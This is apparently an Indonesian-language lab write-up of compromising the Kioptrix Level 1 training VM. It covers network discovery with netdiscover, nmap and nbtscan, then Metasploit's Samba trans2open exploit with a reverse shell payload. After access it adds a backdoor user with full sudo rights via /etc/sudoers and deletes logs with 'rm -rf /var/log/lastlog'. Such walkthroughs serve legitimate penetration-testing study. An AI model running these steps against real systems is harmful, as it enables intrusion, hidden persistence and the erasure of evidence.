Writeup Kioptrix Level 1
OS Kioptrix merupakan sebuah Operating System yang di buat untuk di acak — acak, di “maling” dengan tujuan pembelajaran dalam bidang penetration testing
Langkah pertama
ifconfig lalu cari ip yang sedang digunakan
Gunakan netdiscover, yaitu sebuah tool yang dapat digunakan untuk proses scanning dalam pencarian IP
netdiscover -r 192.168.36.128/24
Gunakan NMAP merupakan sebuah tool yang dapat digunakan untuk melakukan port scanning
nmap -sS 192.168.36.1
nmap -sS 192.168.36.2
nmap -sS 192.168.36.129
nmap -sS 192.168.36.254
Gunakan nbtscan, nbtscan adalah program untuk pemindaian jaringan IP untuk informasi nama NetBIOS
nbtscan 192.168.36.1
Ternyata ip 192.168.36.1 adalah ip desktop yang sedang digunakan.
Lalu coba > nbtscan 192.168.36.129
ketemu hasil dari nbtscan dengan os yang bernama Kioptrix.
Masuk ke > msfconsole
Msfconsole adalah sebuah software yang di gunakan untuk penetration system, mudah di gunakan dan juga memiliki banyak modul dari database sistem yang ada, tool ini menjadi andalan bagi semua penetration user untuk menggunakanya sebagai alat bantu untuk menguji sistem
use auxiliary/scanner/smb/smb_version
Auxiliary adalah menu tambahan yang di gunakan oleh user untuk memodifikasi serangan dan membuat sistem tertembus dengan menggunakan exploit yang sudah di exploitasi , dengan menggunakan menu auxiliary semakin mudah untuk merancang dan menguji sistem yang mereka gunakan
set RHOSTS 192.168.36.129
RHOSTS berfunsi untuk menentukan IP Target
ketik "run"
lalu ketik "exit"
masuk lagi ke msfconsole
search trans2open
Lalu ketik "use exploit/linux/samba/trans2open"
set RHOSTS 192.168.36.129
lalu ketik "run"
Ketik "set payload generic/shell_reverse_tcp"
Lalu ketik "run"
Masuk ke shell reverse dan ketik "whoami" lalu enter
Dan untuk konfigurasi ulang password ketik "passwd"
Tahap maintaining access pada Kioptrix
adduser syahdika
passwd syahdika
> Set password dari user syahdika
pico /etc/sudoers
syahdika ALL=(ALL) ALL
ctrl + x, y > save
Menghapus log
rm -rf /var/log/lastlog
ATAU SIMAK VIDEO LENGKAPNYA DISINI
